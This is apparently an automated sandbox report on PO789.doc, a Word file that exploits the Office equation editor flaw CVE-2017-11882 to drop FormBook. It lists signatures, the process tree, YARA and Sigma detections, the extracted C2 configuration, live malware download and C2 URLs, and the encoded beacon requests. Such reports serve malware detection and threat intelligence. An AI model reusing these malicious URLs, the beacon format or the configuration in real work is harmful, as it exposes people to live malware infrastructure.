
Windows Analysis Report PO789.doc

Overview

General Information

Sample Name: PO789.doc
Analysis ID: 552782
MD5: 6c28e31d32e97db724188025636ac25e
SHA1: c5818d1883785293dfab00d2c1389b82cc74ad60
SHA256: c24d7ca6493677f640cf6d4a90c746f949749f46e45873d77a71b94ab707a21f
Tags: doc, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Office equation editor drops PE file
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Document has an unknown application name
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Document contains Microsoft Equation 3.0 OLE entries
Enables debug privileges
Document contains no OLE stream with summary information
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2644 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • EQNEDT32.EXE (PID: 1124 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • medicomsh78694.exe (PID: 2824 cmdline: C:\Users\user\AppData\Roaming\medicomsh78694.exe MD5: 8807C2E0F2973A22812AF6E61BA72667)
      • medicomsh78694.exe (PID: 2008 cmdline: {path} MD5: 8807C2E0F2973A22812AF6E61BA72667)
        • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • msdt.exe (PID: 2848 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: F67A64C46DE10425045AF682802F5BA6)
            • cmd.exe (PID: 448 cmdline: /c del "C:\Users\user\AppData\Roaming\medicomsh78694.exe" MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.carbonfiber.cloud/md4m/"], "decoy": ["thegreenroomak.net", "boxingforfitness.info", "hynejubelured.com", "elektrocentralybenza.online", "getinteriorsolution.com", "ajctrade.ltd", "boytoyporn.com", "charlotteetlachocolaterie.fr", "martens-suomi.com", "colesfax.com", "laksmanawarehouse.com", "extraordinarymiracle.com", "hunttools.info", "ofertasdesuvsinfosmex.com", "banphimipad.com", "jingjiguanchabao.com", "keepourassets.com", "haveitmore.com", "bleuredmedia.com", "hsgerontech.com", "mms05.xyz", "994671.com", "xsbjbj.com", "syxinyu.com", "costnergroups.com", "muzicalbox.com", "kkstudy.net", "picguru.pro", "avtokitai.store", "artplay.xyz", "4-sidedirect.com", "wa1315.xyz", "pelicancrs.com", "cozastore.net", "maatia.com", "movistar.money", "clickprintus.com", "oblatz.com", "mood-room.com", "erisibu85.com", "bzhjxf.com", "mdcomfortukraine.store", "timo-music.com", "vinovai.xyz", "danielkcarter.store", "segurodevidacovid.com", "somoslaostra.com", "businessis.business", "wholisticard.com", "dummydomain234543.com", "realstakepool.com", "rs23.club", "emobilemarket.com", "mabsfuse.com", "lastra41.com", "safbilgi.com", "prestigiousuniforms.com", "outerverse.space", "formuladushi.online", "yt3013.xyz", "therestaurant.menu", "lentellas.com", "rutube.cloud", "mywhitelotus.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings

Source: 00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp
  Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
  Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
    Strings:
    • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
    Strings:
    • 0x16ae9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bfc:$sqlite3step: 68 34 1C 7B E1
    • 0x16b18:$sqlite3text: 68 38 2A 90 C5
    • 0x16c3d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c53:$sqlite3blob: 68 53 D8 7F 8C

Source: 00000005.00000000.421277474.0000000000400000.00000040.00000001.sdmp
  Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
  Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
    Strings:
    • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

(30 entries in total; only those above are shown)

Unpacked PEs

Source | Rule | Description | Author | Strings

Source: 4.2.medicomsh78694.exe.3221198.4.raw.unpack
  Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
  Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
    Strings:
    • 0x83e38:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x841d2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0xabc58:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0xabff2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8fee5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0xb7d05:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x8f9d1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0xb77f1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x8ffe7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0xb7e07:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x9015f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xb7f7f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x84bea:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0xaca0a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x8ec4c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb6a6c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x85962:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0xad782:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x953d7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0xbd1f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x9647a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
    Strings:
    • 0x92309:$sqlite3step: 68 34 1C 7B E1
    • 0x9241c:$sqlite3step: 68 34 1C 7B E1
    • 0xba129:$sqlite3step: 68 34 1C 7B E1
    • 0xba23c:$sqlite3step: 68 34 1C 7B E1
    • 0x92338:$sqlite3text: 68 38 2A 90 C5
    • 0x9245d:$sqlite3text: 68 38 2A 90 C5
    • 0xba158:$sqlite3text: 68 38 2A 90 C5
    • 0xba27d:$sqlite3text: 68 38 2A 90 C5
    • 0x9234b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x92473:$sqlite3blob: 68 53 D8 7F 8C
    • 0xba16b:$sqlite3blob: 68 53 D8 7F 8C
    • 0xba293:$sqlite3blob: 68 53 D8 7F 8C

Source: 5.2.medicomsh78694.exe.400000.0.raw.unpack
  Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
  Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
    Strings:
    • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

(6 entries in total; only those above are shown)

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection; Author: Joe Security; Data: DestinationIp: 2.58.149.41, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1124, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1124, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\medicomzx[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started; Author: Florian Roth; Data: Command: C:\Users\user\AppData\Roaming\medicomsh78694.exe, CommandLine: C:\Users\user\AppData\Roaming\medicomsh78694.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\medicomsh78694.exe, NewProcessName: C:\Users\user\AppData\Roaming\medicomsh78694.exe, OriginalFileName: C:\Users\user\AppData\Roaming\medicomsh78694.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1124, ProcessCommandLine: C:\Users\user\AppData\Roaming\medicomsh78694.exe, ProcessId: 2824
Sigma detected: Possible Applocker Bypass
Source: Process started; Author: juju4; Data: Command: C:\Windows\SysWOW64\msdt.exe, CommandLine: C:\Windows\SysWOW64\msdt.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\msdt.exe, NewProcessName: C:\Windows\SysWOW64\msdt.exe, OriginalFileName: C:\Windows\SysWOW64\msdt.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 1764, ProcessCommandLine: C:\Windows\SysWOW64\msdt.exe, ProcessId: 2848

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp; Malware Configuration Extractor: FormBook {"C2 list": ["www.carbonfiber.cloud/md4m/"], "decoy": ["thegreenroomak.net", "boxingforfitness.info", "hynejubelured.com", "elektrocentralybenza.online", "getinteriorsolution.com", "ajctrade.ltd", "boytoyporn.com", "charlotteetlachocolaterie.fr", "martens-suomi.com", "colesfax.com", "laksmanawarehouse.com", "extraordinarymiracle.com", "hunttools.info", "ofertasdesuvsinfosmex.com", "banphimipad.com", "jingjiguanchabao.com", "keepourassets.com", "haveitmore.com", "bleuredmedia.com", "hsgerontech.com", "mms05.xyz", "994671.com", "xsbjbj.com", "syxinyu.com", "costnergroups.com", "muzicalbox.com", "kkstudy.net", "picguru.pro", "avtokitai.store", "artplay.xyz", "4-sidedirect.com", "wa1315.xyz", "pelicancrs.com", "cozastore.net", "maatia.com", "movistar.money", "clickprintus.com", "oblatz.com", "mood-room.com", "erisibu85.com", "bzhjxf.com", "mdcomfortukraine.store", "timo-music.com", "vinovai.xyz", "danielkcarter.store", "segurodevidacovid.com", "somoslaostra.com", "businessis.business", "wholisticard.com", "dummydomain234543.com", "realstakepool.com", "rs23.club", "emobilemarket.com", "mabsfuse.com", "lastra41.com", "safbilgi.com", "prestigiousuniforms.com", "outerverse.space", "formuladushi.online", "yt3013.xyz", "therestaurant.menu", "lentellas.com", "rutube.cloud", "mywhitelotus.com"]}
Multi AV Scanner detection for submitted file
Source: PO789.doc; Virustotal: Detection: 57%
Source: PO789.doc; ReversingLabs: Detection: 53%
Yara detected FormBook
Source: Yara match; File source: 4.2.medicomsh78694.exe.3221198.4.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.2.medicomsh78694.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.0.medicomsh78694.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.0.medicomsh78694.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000000.421277474.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.426191133.0000000003139000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.459738271.00000000001C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000000.451724883.00000000097D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.674644749.00000000001E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000000.444150241.00000000097D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000000.421612271.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.674669854.0000000000210000.00000004.00000001.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://peak-tv.tk/medicomzx.exe; Avira URL Cloud: Label: malware
Source: http://www.muzicalbox.com/md4m/?o6=iLbGWxMFXdgKEpL2TSMWaw9OaDtRDyXHkSE5TtIvNbs2aDnrNryG0VWzTBZoyEuMZj5Q2g==&WZ8=Jpspdz90i; Avira URL Cloud: Label: malware
Source: http://www.extraordinarymiracle.com/md4m/?o6=g4mIzHCmTqQfqybpH+qy2JB4BTiy5veIhmlYwoI1p7WHXjRjdWpxwA0RJbk1Zi8DwkVpDA==&WZ8=Jpspdz90i; Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: peak-tv.tk; Virustotal: Detection: 5%
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{828CF0EA-BCAC-4336-9A41-FE0BC8A11CE4}.tmp; Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\medicomzx[1].exe; Metadefender: Detection: 34%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\medicomzx[1].exe; ReversingLabs: Detection: 51%
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe; Metadefender: Detection: 34%
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe; ReversingLabs: Detection: 51%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\medicomzx[1].exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe; Joe Sandbox ML: detected
Source: 5.0.medicomsh78694.exe.400000.5.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.medicomsh78694.exe.400000.9.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.medicomsh78694.exe.400000.7.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.2.medicomsh78694.exe.400000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Users\user\AppData\Roaming\medicomsh78694.exe
Source: ~WRF{828CF0EA-BCAC-4336-9A41-FE0BC8A11CE4}.tmp.0.dr; Stream path '_1703602930/\x1CompObj' : ...........................F....Microsoft Equation
Source: unknown; Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: wntdll.pdb source: medicomsh78694.exe, medicomsh78694.exe, 00000005.00000003.421954083.0000000000540000.00000004.00000001.sdmp, medicomsh78694.exe, 00000005.00000002.460764763.0000000000D20000.00000040.00000001.sdmp, medicomsh78694.exe, 00000005.00000003.422999608.00000000006A0000.00000004.00000001.sdmp, medicomsh78694.exe, 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, msdt.exe
Source: Binary string: msdt.pdb source: medicomsh78694.exe, 00000005.00000003.458755540.0000000002800000.00000004.00000001.sdmp, medicomsh78694.exe, 00000005.00000002.461556761.0000000002700000.00000040.00020000.sdmp, medicomsh78694.exe, 00000005.00000003.458361756.0000000002700000.00000004.00000001.sdmp
Source: global traffic; DNS query: name: peak-tv.tk
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe; Code function: 4x nop then lea esp, dword ptr [ebp-08h]; 4_2_0037BA28
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe; Code function: 4x nop then lea esp, dword ptr [ebp-08h]; 4_2_0037BAD8
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe; Code function: 4x nop then lea esp, dword ptr [ebp-08h]; 4_2_0037BBC8
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe; Code function: 4x nop then lea esp, dword ptr [ebp-08h]; 4_2_0037BA18
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe; Code function: 4x nop then lea esp, dword ptr [ebp-08h]; 4_2_0037BAC8
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe; Code function: 4x nop then lea esp, dword ptr [ebp-08h]; 4_2_0037BBC0
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe; Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h; 4_2_0044F2A8
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe; Code function: 4x nop then pop ebx; 5_2_00406ABB
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe; Code function: 4x nop then pop edi; 5_2_0040C41C
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe; Code function: 4x nop then pop edi; 5_2_0041566C
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe; Code function: 4x nop then pop edi; 5_2_004156A7
Source: global traffic; TCP traffic: 192.168.2.22:49167 -> 2.58.149.41:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 34.102.136.180:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 34.102.136.180:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 34.102.136.180:80
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49172 -> 91.195.240.13:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49172 -> 91.195.240.13:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49172 -> 91.195.240.13:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe; Domain query: www.muzicalbox.com
Source: C:\Windows\explorer.exe; Network Connect: 23.227.38.74 80
Source: C:\Windows\explorer.exe; Network Connect: 91.195.240.13 80
Source: C:\Windows\explorer.exe; Domain query: www.extraordinarymiracle.com
Source: C:\Windows\explorer.exe; Domain query: www.realstakepool.com
Source: C:\Windows\explorer.exe; Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe; Network Connect: 109.94.209.123 80
Source: C:\Windows\explorer.exe; Domain query: www.prestigiousuniforms.com
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor; URLs: www.carbonfiber.cloud/md4m/
Source: Joe Sandbox View; ASN Name: GBTCLOUDUS GBTCLOUDUS
Source: Joe Sandbox View; ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: global traffic; HTTP traffic detected: GET /md4m/?o6=p4xWrkA40RaAiMZ6Ntaaay3F30x2NdNJQ5dt1rIhfvyBUiMTXG+B7J0pDtQSIysgwfDsvA==&WZ8=Jpspdz90i HTTP/1.1 | Host: www.prestigiousuniforms.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic; HTTP traffic detected: GET /md4m/?o6=iLbGWxMFXdgKEpL2TSMWaw9OaDtRDyXHkSE5TtIvNbs2aDnrNryG0VWzTBZoyEuMZj5Q2g==&WZ8=Jpspdz90i HTTP/1.1 | Host: www.muzicalbox.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic; HTTP traffic detected: GET /md4m/?o6=g4mIzHCmTqQfqybpH+qy2JB4BTiy5veIhmlYwoI1p7WHXjRjdWpxwA0RJbk1Zi8DwkVpDA==&WZ8=Jpspdz90i HTTP/1.1 | Host: www.extraordinarymiracle.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic; HTTP traffic detected: GET /md4m/?o6=iivCXU6wK9iYddcjehmaxCiNBPMMgXmeZKHdMU3TLXq0dC3uGVX9MdG5RNTIsnXyIv0bSw==&WZ8=Jpspdz90i HTTP/1.1 | Host: www.realstakepool.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View; IP Address: 2.58.149.41 2.58.149.41
Source: global traffic; HTTP traffic detected: HTTP/1.1 200 OK | Date: Thu, 13 Jan 2022 17:17:00 GMT | Server: Apache | Last-Modified: Tue, 11 Jan 2022 16:19:34 GMT | ETag: "aca00-5d550d19904c2" | Accept-Ranges: bytes | Content-Length: 707072 | Keep-Alive: timeout=5, max=100 | Connection: Keep-Alive | Content-Type: application/octet-stream | Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ed 9c dd 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 b4 0a 00 00 14 00 00 00 00 00 00 d6 d2 0a 00 00 20 00 00 00 e0 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 d2 0a 00 4f 00 00 00 00 e0 0a 00 a8 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 dc b2 0a 00 00 20 00 00 00 b4 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 a8 10 00 00 00 e0 0a 00 00 12 00 00 00 b6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0b 00 00 02 00 00 00 c8 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 d2 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 0c f4 01 00 18 bb 02 00 03 00 00 00 cb 02 00 06 24 af 04 00 60 23 06 00 00 00 00 00 
